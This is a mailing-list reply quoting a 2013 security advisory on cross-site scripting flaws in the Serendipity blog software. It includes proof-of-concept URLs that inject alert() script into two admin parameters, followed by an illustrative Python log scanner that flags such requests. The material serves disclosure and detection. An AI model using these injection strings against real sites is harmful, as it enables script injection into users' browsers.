Re: [Full-disclosure] XSS Vulnerabilities in Serendipity
On Fri, Jul 12, 2013 at 02:29:52PM +0300, Netsparker Advisories wrote:
> Information
> --------------------
> Name : XSS Vulnerabilities in Serendipity
> Software : Serendipity 1.6.2 and possibly below.
> Vendor Homepage : http://www.s9y.org/
> Vulnerability Type : Cross-Site Scripting
> Severity : Medium
> Researcher : Omar Kurt
> Advisory Reference : NS-13-003
>
> Description
> --------------------
> Serendipity is a PHP-powered weblog application which gives the user an
> easy way to maintain an online diary, weblog or even a complete homepage.
> While the default package is designed for the casual blogger, Serendipity
> offers a flexible, expandable and easy-to-use framework with the power for
> professional applications.
>
> Details
> --------------------
> Serendipity is affected by XSS vulnerabilities in version 1.6.2.
>
> http://example.com/serendipity_admin_image_selector.php?serendipity%5Btextarea%5D=%27%2Balert(0x000887)%2B%27&serendipity%5Baction%5D=208.100.0.117&serendipity%5BadminAction%5D=208.100.0.117&serendipity%5BadminModule%5D=208.100.0.117&serendipity%5Bstep%5D=default&serendipity%5Bonly_path%5D=208.100.0.117
> http://example.com/serendipity_admin_image_selector.php?serendipity%5Bhtmltarget%5D=%27%2Balert(0x000A02)%2B%27&serendipity%5Baction%5D=208.100.0.117&serendipity%5BadminAction%5D=208.100.0.117&serendipity%5BadminModule%5D=208.100.0.117&serendipity%5Bstep%5D=default&serendipity%5Bonly_path%5D=208.100.0.117
>
> You can read the full article about Cross-Site Scripting from here :
> http://www.mavitunasecurity.com/crosssite-scripting-xss/
>
> Solution
> --------------------
> The vendor fixed this vulnerability in the new version. Please see the
> references.
>
> Advisory Timeline
> --------------------
> 26/02/2013 - First contact
> 04/03/2013 - Sent the details
> 10/07/2013 - Advisory released
>
> References
> --------------------
> Vendor Url / Patch : -
> MSL Advisory Link :
> https://www.mavitunasecurity.com/xss-vulnerabilities-in-serendipity/
> Netsparker Advisories :
> http://www.mavitunasecurity.com/netsparker-advisories/
So is this fixed in version 1.7? No vendor URL/path listed in your references.
Does this vulnerability have a CVE identifier? What was the vendor response?
---
Henri Salo
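
A log check for the two parameters named in the advisory, as an added example that is not part of the original thread or of Serendipity's code. It assumes legitimate values of these parameters are plain field names; the safe-character set and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Endpoint and parameter names come from the advisory quoted above.
ENDPOINT = "serendipity_admin_image_selector.php"
WATCHED = {"serendipity[textarea]", "serendipity[htmltarget]"}
# Assumption: legitimate values are plain form-field / element names.
SAFE_VALUE = re.compile(r"[A-Za-z0-9_\-\[\]]*")
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

SAMPLE_LOG = [  # constructed access-log lines (combined log format)
    '192.0.2.10 - - [12/Jul/2013:14:00:01 +0300] "GET /serendipity_admin_image_selector.php?serendipity%5Btextarea%5D=body&serendipity%5Bstep%5D=default HTTP/1.1" 200 5120',
    '192.0.2.44 - - [12/Jul/2013:14:00:07 +0300] "GET /serendipity_admin_image_selector.php?serendipity%5Bhtmltarget%5D=%27%2Balert(0x000A02)%2B%27&serendipity%5Bstep%5D=default HTTP/1.1" 200 5188',
    '192.0.2.44 - - [12/Jul/2013:14:00:09 +0300] "GET /index.php?serendipity%5Btextarea%5D=%27%2Balert(0x000887)%2B%27 HTTP/1.1" 200 9001',
    '192.0.2.51 - - [12/Jul/2013:14:02:30 +0300] "GET /blog/serendipity_admin_image_selector.php?serendipity%5Btextarea%5D=%27%2Balert(0x000887)%2B%27&serendipity%5Bhtmltarget%5D=entry HTTP/1.1" 200 5190',
]


def suspicious_params(target):
    """Return the watched parameters in a request target whose decoded
    value contains characters outside the assumed-safe set."""
    parts = urlsplit(target)
    if not parts.path.endswith("/" + ENDPOINT):
        return []
    hits = []
    # parse_qsl percent-decodes both names and values exactly once.
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if name in WATCHED and not SAFE_VALUE.fullmatch(value):
            hits.append(name)
    return hits


def scan(log_lines):
    """Yield (line_number, parameter_names) for each matching log line."""
    for number, line in enumerate(log_lines, 1):
        match = REQUEST.search(line)
        if match:
            hits = suspicious_params(match.group(1))
            if hits:
                yield number, hits


if __name__ == "__main__":
    for number, names in scan(SAMPLE_LOG):
        print(f"line {number}: unexpected characters in {', '.join(names)}")
```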